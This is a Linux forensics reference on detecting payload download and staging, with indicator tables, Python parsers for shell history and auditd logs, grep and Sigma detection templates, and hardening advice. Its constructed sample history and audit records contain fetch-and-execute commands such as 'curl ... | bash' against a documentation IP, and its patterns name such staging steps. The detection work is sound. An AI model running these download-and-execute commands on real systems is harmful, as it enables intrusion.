This note documents detection patterns related to Payload Download and Staging on Linux systems.
Direct Indicators
| Source | Grep Pattern / Artifact | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
| Shell history | curl http | Remote payload retrieval | Critical | Very common first-stage delivery. |
| Shell history | wget http | Remote payload retrieval | Critical | Common operator behavior. |
| Shell history | curl -O | File downloaded directly | High | Often leaves staged binary locally. |
| Shell history | wget -O | Explicit output file chosen | Critical | Often reveals attacker naming. |
| Shell history | `curl \| bash` | Inline remote execution | Critical | No staged file may remain on disk. |
| Shell history | `wget -O- \| sh` | Streamed execution | Critical | Output goes to stdout, never to a file. |
| Shell history | chmod +x | Payload prepared for execution | Critical | Strong staging continuation. |
| Shell history | ./payload | Local staged binary executed | Critical | Direct post-download execution. |
| Shell history | base64 -d | Payload decoded locally | High | Common obfuscation step. |
| Shell history | tar, unzip | Archive extraction | High | Multi-file staging. |
| auditd | execve of curl/wget/chmod | Process-level staging evidence | Critical | Best attribution if enabled. |
| File timestamps | new file in temp dirs | Payload materialized | Critical | Strong timeline anchor. |
| Network telemetry | outbound HTTP/HTTPS fetch | Retrieval confirmed | Critical | Supports command evidence. |
| journalctl | downloader invocation | Journald process evidence | High | Depends on logging setup. |
| EDR telemetry | downloader → shell/binary chain | Execution lineage | Critical | Strong staged compromise indicator. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| Download immediately after SSH login | Manual operator staging | Critical | Common foothold progression. |
| Download into /tmp | Disposable payload placement | Critical | Highly common attacker pattern. |
| Download into /dev/shm | Memory-backed stealth staging | Critical | Higher stealth intent. |
| Download then chmod then execute | Full attacker chain | Critical | Very high confidence malicious sequence. |
| Renamed payload to service-like name | Camouflage | High | Common stealth behavior. |
| Hidden file staging | .cache, .sys, dot-prefixed names | High | Evasion attempt. |
| Download followed by reverse shell | Stage-to-shell chain | Critical | Strong intrusion evidence. |
| Download from raw IP | Direct operator infra | High | Often suspicious. |
| Download from paste/raw services | Scripted staging | High | Common attacker convenience. |
| Archive then extraction then service install | Multi-stage persistence | Critical | Advanced staging path. |
Common Tools
| Tool | Usage |
|---|---|
| curl | Primary payload retrieval utility. |
| wget | Common alternative retriever. |
| scp | File transfer from attacker host. |
| base64 | Encoded payload transport. |
| tar / unzip | Multi-file extraction. |
| chmod | Execution preparation. |
| python -m http.server | Common attacker-hosted simple delivery source. |
Relevant Artifacts
| Artifact | Path / Command | Forensic Value | Notes |
|---|---|---|---|
| Shell history | .bash_history, .zsh_history | Critical | Primary staging evidence. |
| Temp directories | /tmp, /var/tmp, /dev/shm | Critical | Primary payload locations. |
| Audit logs | /var/log/audit/audit.log | Critical | Process attribution. |
| Network logs | proxy/firewall/netflow | Critical | Download confirmation. |
| File metadata | stat | Critical | Creation timeline. |
| Journald | journalctl | High | Process clues. |
| Extracted archives | temp dirs / home dirs | High | Secondary stage content. |
| Web roots | /var/www, app dirs | High | Download may originate from web foothold. |
MITRE ATT&CK References
- T1105 Ingress Tool Transfer
- T1059 Command and Scripting Interpreter
- T1027 Obfuscated Files or Information
Decision Tree
- Was remote retrieval executed?
  - Identify curl, wget, scp, base64 activity.
- Where was payload written?
  - Determine temp, home, service path.
- Was payload made executable?
  - Check chmod and file mode changes.
- Was payload executed?
  - Shell history, auditd, process traces.
- Was staging followed by persistence?
  - Inspect cron, services, keys, users.
- Pivot
  - Download source → operator infra.
  - File path → execution chain.
  - Timestamp → correlate with access event.
- Confirm staging
  - Downloader + file creation + chmod + execution = strong payload staging.
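Worked example, added here and not part of the original note: it applies the decision tree above to a shell history file. Each line is split into its pipeline stages, every curl/wget download is recorded together with the path it wrote to, and later chmod and execution of that same path (including after a rename) are linked back to it; `curl ... | bash` is reported separately as inline execution that leaves no file behind. The HISTORY text, the 203.0.113.10 address (a documentation range) and the flag names are constructed for the example; only the common `-o`, `-O` and default-name output forms of curl and wget are parsed.

```python
"""Reconstruct payload-staging chains from a Linux shell history (added example)."""
import posixpath
import re
import shlex

DOWNLOADERS = {"curl", "wget"}
SHELLS = {"bash", "sh", "dash", "zsh", "python", "python3", "perl"}
SEPARATORS = {"|", ";", "&", "&&", "||"}
RAW_IP = re.compile(r"^[a-z]+://\d{1,3}(?:\.\d{1,3}){3}(?:[:/]|$)")
# chmod modes that set an execute bit: +x, a+x, u+rwx, or octal with an odd digit
EXEC_MODE = re.compile(r"[ugoa]*\+[rwXst]*x[rwXst]*"
                       r"|[0-7]?(?:[0-7]{2}[1357]|[0-7][1357][0-7]|[1357][0-7]{2})")

# Constructed sample history; 203.0.113.10 is a documentation address.
HISTORY = """\
wget -O /tmp/.x http://203.0.113.10/p
chmod +x /tmp/.x
/tmp/.x
curl -s http://203.0.113.10/i.sh | bash
curl -o /dev/shm/k http://203.0.113.10/k
mv /dev/shm/k /dev/shm/kworker
chmod 755 /dev/shm/kworker
nohup /dev/shm/kworker &
curl -O https://example.invalid/upd.tar.gz
"""


def split_pipeline(line):
    """Split a history line into (argv, separator-that-follows) pairs."""
    lex = shlex.shlex(line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True  # keep URLs whole, split on | ; & && ||
    try:
        tokens = list(lex)
    except ValueError:  # unbalanced quotes: nothing reliable to parse
        return []
    cmds, cur = [], []
    for tok in tokens:
        if tok in SEPARATORS:
            cmds.append((cur, tok))
            cur = []
        else:
            cur.append(tok)
    cmds.append((cur, None))
    return [(argv, sep) for argv, sep in cmds if argv]


def output_path(tool, args, url):
    """Where curl/wget writes: a path, '-' for stdout, None if unknown."""
    for i, a in enumerate(args[:-1]):
        if (tool, a) in (("curl", "-o"), ("curl", "--output"), ("wget", "-O")):
            return args[i + 1]
    if tool == "wget" and "-O-" in args:
        return "-"
    if url and (tool == "wget" or "-O" in args):
        return posixpath.basename(url) or None  # the tool's default file name
    return "-" if tool == "curl" else None


def analyze(history):
    """Map each staged path to the history lines of its download/chmod/exec."""
    norm = lambda p: p[2:] if p.startswith("./") else p  # ./x and x are one file
    staged, inline = {}, []
    for n, line in enumerate(history.splitlines(), 1):
        cmds = split_pipeline(line)
        for idx, (argv, sep) in enumerate(cmds):
            while posixpath.basename(argv[0]) in ("sudo", "nohup", "setsid") and len(argv) > 1:
                argv = argv[1:]  # sudo/nohup/setsid X -> X
            tool, args = posixpath.basename(argv[0]), argv[1:]
            hits = [norm(a) for a in args if norm(a) in staged]
            if norm(argv[0]) in staged or (tool in SHELLS and hits):
                run = [norm(argv[0])] if norm(argv[0]) in staged else hits
                for p in run:  # staged file run directly, or via bash /tmp/x
                    staged[p]["exec"] = n
            elif tool in DOWNLOADERS:
                url = next((a for a in args if "://" in a), "")
                nxt = cmds[idx + 1][0] if sep == "|" and idx + 1 < len(cmds) else None
                if nxt and posixpath.basename(nxt[0]) in SHELLS:
                    inline.append((n, url))  # curl ... | bash leaves no file
                    continue
                dest = output_path(tool, args, url)
                if dest and dest != "-":
                    rec = staged.setdefault(norm(dest), {"download": n, "flags": set()})
                    if RAW_IP.match(url):
                        rec["flags"].add("raw-ip source")
                    if posixpath.basename(dest).startswith("."):
                        rec["flags"].add("hidden file")
                    if dest.startswith("/dev/shm/"):
                        rec["flags"].add("memory-backed staging")
                    elif dest.startswith(("/tmp/", "/var/tmp/")):
                        rec["flags"].add("temp dir staging")
            elif tool == "chmod" and any(EXEC_MODE.fullmatch(a) for a in args):
                for p in hits:
                    staged[p]["chmod"] = n
            elif tool == "mv" and len(args) == 2 and hits:
                rec = staged.pop(hits[0])  # follow the rename
                rec["flags"].add("renamed to " + posixpath.basename(args[1]))
                staged[norm(args[1])] = rec
    for rec in staged.values():
        seen = sum(k in rec for k in ("chmod", "exec"))
        rec["verdict"] = ("retrieved only", "partial chain", "strong staging chain")[seen]
    return {"staged": staged, "inline": inline}
```

Run against a real `.bash_history`, the `verdict` for each path mirrors the "Confirm staging" rule (download + chmod + execution = strong), while the `flags` carry the indirect indicators (hidden name, /dev/shm, raw-IP source, rename) for the analyst to weigh. History has no timestamps unless `HISTTIMEFORMAT` was set, so line order is the only sequence evidence here; pair it with file timestamps or auditd before drawing conclusions.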
Example Detection Templates
Grep
```bash
# Download and inline-execution commands anywhere under user, root and temp dirs
grep -R "curl http\|wget http\|curl -O\|wget -O\|curl | bash\|wget -O-" /home /root /tmp /var/tmp 2>/dev/null
# Staging continuation: execute bit, decoding, archive extraction
grep -R "chmod +x\|base64 -d\|tar \|unzip " /home /root /tmp /var/tmp 2>/dev/null
# Downloader use in shell history only
grep -R "curl\|wget" /home/*/.bash_history /root/.bash_history 2>/dev/null
```
Journalctl
```bash
# Journald entries mentioning downloaders or staging utilities
journalctl | grep -E "curl|wget|chmod|base64"
```
File Inspection
```bash
# Modification-time timeline of every file in the usual staging directories
find /tmp /var/tmp /dev/shm -type f -printf '%TY-%Tm-%Td %TT %p\n' 2>/dev/null | sort
# Files with any execute bit set in those directories
find /tmp /var/tmp /dev/shm -perm /111 -type f 2>/dev/null
```
Sigma
```yaml
title: Linux Payload Download and Staging
id: linux-payload-download-staging
status: experimental
description: Detects payload retrieval and local staging behavior on Linux systems
logsource:
  product: linux
detection:
  selection_keywords:
    message|contains:
      - 'curl'
      - 'wget'
      - 'chmod +x'
      - 'base64 -d'
  condition: selection_keywords
fields:
  - message
  - hostname
falsepositives:
  - Legitimate package retrieval
level: high
tags:
  - attack.command_and_control
  - attack.t1105
```
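The auditd and EDR rows in the indicator tables rest on process telemetry rather than on history files. The following added example (not from this note) shows how to rebuild that evidence from raw `audit.log` records: records sharing one audit serial are grouped into a single event, hex-encoded argv elements are decoded, relative names are resolved against the recorded cwd (something a history file cannot do), and both the download → chmod → execute chain and the parent lineage of the staged binary are reconstructed. The records, PIDs, the auditd rule lines quoted in the comment, and the 203.0.113.10 address are all constructed assumptions; only the `curl -o` / `wget -O` output forms are parsed.

```python
"""Rebuild execve timelines and process lineage from auditd records (added example)."""
import posixpath
import re

REC = re.compile(r"^type=(\w+) msg=audit\((\d+\.\d+):(\d+)\): (.*)$")
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')
DOWNLOADERS = {"curl", "wget"}

# Constructed records; they assume execve rules such as (assumed, not from the note):
#   -a always,exit -F arch=b64 -S execve -F exe=/usr/bin/curl -k payload_staging
#   -a always,exit -F arch=b64 -S execve -F dir=/tmp -k tmp_exec
# a2 of serial 2003 is hex-encoded because the argument contains a space.
AUDIT_LOG = """\
type=SYSCALL msg=audit(1700000099.500:2000): arch=c000003e syscall=59 success=yes exit=0 ppid=2999 pid=3100 auid=1000 uid=1000 comm="bash" exe="/usr/bin/bash" key=(null)
type=EXECVE msg=audit(1700000099.500:2000): argc=1 a0="-bash"
type=SYSCALL msg=audit(1700000100.101:2001): arch=c000003e syscall=59 success=yes exit=0 ppid=3100 pid=3101 auid=1000 uid=1000 comm="curl" exe="/usr/bin/curl" key="payload_staging"
type=EXECVE msg=audit(1700000100.101:2001): argc=4 a0="curl" a1="-o" a2=".x" a3="http://203.0.113.10/p"
type=CWD msg=audit(1700000100.101:2001): cwd="/tmp"
type=SYSCALL msg=audit(1700000100.450:2002): arch=c000003e syscall=59 success=yes exit=0 ppid=3100 pid=3102 auid=1000 uid=1000 comm="chmod" exe="/usr/bin/chmod" key="payload_staging"
type=EXECVE msg=audit(1700000100.450:2002): argc=3 a0="chmod" a1="+x" a2=".x"
type=CWD msg=audit(1700000100.450:2002): cwd="/tmp"
type=SYSCALL msg=audit(1700000101.020:2003): arch=c000003e syscall=59 success=yes exit=0 ppid=3100 pid=3103 auid=1000 uid=1000 comm="sh" exe="/usr/bin/dash" key=(null)
type=EXECVE msg=audit(1700000101.020:2003): argc=3 a0="sh" a1="-c" a2=2F746D702F2E782026
type=SYSCALL msg=audit(1700000101.025:2004): arch=c000003e syscall=59 success=yes exit=0 ppid=3103 pid=3104 auid=1000 uid=1000 comm=".x" exe="/tmp/.x" key="tmp_exec"
type=EXECVE msg=audit(1700000101.025:2004): argc=1 a0="/tmp/.x"
"""


def decode_value(raw, may_be_hex):
    """Audit quotes printable strings; values with spaces or odd bytes are hex."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1]
    if may_be_hex and re.fullmatch(r"(?:[0-9A-Fa-f]{2})+", raw):
        return bytes.fromhex(raw).decode("utf-8", "replace")
    return raw


def parse_audit(text):
    """Group SYSCALL/EXECVE/CWD records by serial; return events by timestamp."""
    events = {}
    for line in text.splitlines():
        m = REC.match(line)
        if not m:
            continue
        rtype, ts, serial, body = m.groups()
        ev = events.setdefault(serial, {"ts": float(ts), "serial": serial, "fields": {}, "argv": {}})
        for key, raw in FIELD.findall(body):
            if rtype == "EXECVE" and re.fullmatch(r"a\d+", key):
                ev["argv"][int(key[1:])] = decode_value(raw, True)
            elif rtype in ("SYSCALL", "CWD"):
                ev["fields"][key] = decode_value(raw, False)
    for ev in events.values():  # argv may span several EXECVE records
        ev["argv"] = [ev["argv"][i] for i in sorted(ev["argv"])]
    return sorted(events.values(), key=lambda e: e["ts"])


def resolve(path, cwd):
    """Relative names in argv only make sense against the recorded cwd."""
    return posixpath.normpath(path if path.startswith("/") else posixpath.join(cwd, path))


def output_path(argv, cwd):
    """Destination of curl -o / wget -O, or None (stdout, default name, unknown)."""
    flag = "-o" if posixpath.basename(argv[0]) == "curl" else "-O"
    for i, a in enumerate(argv[:-1]):
        if a == flag and argv[i + 1] != "-":
            return resolve(argv[i + 1], cwd)
    return None


def lineage(events, pid):
    """Walk ppid links through the execve events to show who spawned pid."""
    by_pid = {ev["fields"].get("pid"): ev for ev in events if ev["argv"]}
    chain = []  # last execve seen for a pid wins; pids are reused over time
    while pid in by_pid and all(p != pid for p, _ in chain):
        ev = by_pid[pid]
        chain.append((pid, " ".join(ev["argv"])))
        pid = ev["fields"].get("ppid")
    chain.append((pid, "<not in log>"))
    return chain


def staging_chain(events):
    """Link download, chmod and execution of the same resolved file path."""
    staged = {}
    for ev in events:
        argv, f = ev["argv"], ev["fields"]
        if not argv:
            continue
        cwd, tool = f.get("cwd", "/"), posixpath.basename(argv[0])
        stamp = (ev["ts"], f.get("pid"), f.get("auid"))
        if tool in DOWNLOADERS:
            dest = output_path(argv, cwd)
            if dest:
                staged[dest] = {"download": stamp}
        elif tool == "chmod":  # any chmod touching a staged file; mode stays in argv
            for a in argv[1:]:
                if resolve(a, cwd) in staged:
                    staged[resolve(a, cwd)]["chmod"] = stamp
        elif resolve(argv[0], cwd) in staged:
            staged[resolve(argv[0], cwd)]["exec"] = stamp
    for rec in staged.values():
        rec["complete"] = {"download", "chmod", "exec"} <= rec.keys()
    return staged
```

Each stage carries its timestamp, pid and `auid`; the `auid` is the login identity that survives `su`/`sudo`, which is what makes auditd the best attribution source in the indicator table. `lineage()` reproduces the "downloader → shell/binary chain" view an EDR would show, and it stops at the first parent that was not recorded (here the sshd parent of the login shell), so a gap at the top of the chain means the rules did not cover that ancestor, not that it did not exist.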
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| Egress filtering | Restrict arbitrary outbound HTTP/HTTPS | Critical | Stops many delivery paths. |
| Temp execution control | Limit execution from temp dirs | Critical | High-value prevention. |
| Auditd | Monitor downloader and chmod execution | High | Strong process visibility. |
| Proxy controls | Force authenticated outbound retrieval | High | Improves attribution. |
| File monitoring | Watch temp directories for executables | High | Strong invariant detection. |
| Least privilege | Restrict service account shell utility access | High | Reduces staging options. |
Fast Triage Checks
| Question | Command / Artifact | Why It Matters |
|---|---|---|
| Was payload downloaded? | grep curl/wget | Establish delivery. |
| Where is payload now? | inspect temp dirs | Locate executable. |
| Was it made executable? | find executable temp files | Detect staging completion. |
| Was it executed? | shell history / auditd | Confirm compromise progression. |
| Was source external suspicious? | inspect URL/IP | Infra clue. |
| Did persistence follow? | inspect cron/services/keys | Stabilization evidence. |
High Value Grep Strings
| Pattern | Why It Matters |
|---|---|
| curl http | Direct remote retrieval. |
| wget http | Direct remote retrieval. |
| curl -O | File output staging. |
| wget -O | Explicit output naming. |
| `curl \| bash` | Inline remote execution. |
| wget -O- | Stream execution. |
| chmod +x | Execution preparation. |
| base64 -d | Decoding staged content. |
| tar | Archive extraction. |
| unzip | Archive extraction. |
Analyst Notes
| Scenario | Interpretation |
|---|---|
| Curl + chmod + execute | Very strong malicious staging chain. |
| Download into /dev/shm | Higher stealth intent. |
| Payload named like service | Camouflage likely. |
| Download then reverse shell | Stage-to-operator progression. |
| Downloader without file left | Inline execution likely. |
| Base64 decode before execute | Obfuscation present. |